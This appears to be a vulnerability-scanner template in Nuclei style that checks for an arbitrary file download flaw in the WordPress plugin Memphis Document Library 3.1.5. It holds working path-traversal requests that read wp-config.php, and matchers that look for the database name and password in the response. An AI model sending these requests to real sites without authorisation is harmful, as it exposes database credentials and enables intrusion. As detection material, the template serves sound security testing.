id: wp-plugin-memphis-documents-library-lfi

info:
  name: WordPress Plugin Memphis Document Library 3.1.5 LFI
  severity: high
  tags: wordpress,wp-plugin,lfi,rfd
  description: arbitrary file download in Memphis Document Library 3.1.5
  reference: https://www.exploit-db.com/exploits/39593

requests:
  - method: GET
    path:
      - '{{BaseURL}}/mdocs-posts/?mdocs-img-preview=../../../wp-config.php'
      - '{{BaseURL}}/?mdocs-img-preview=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200
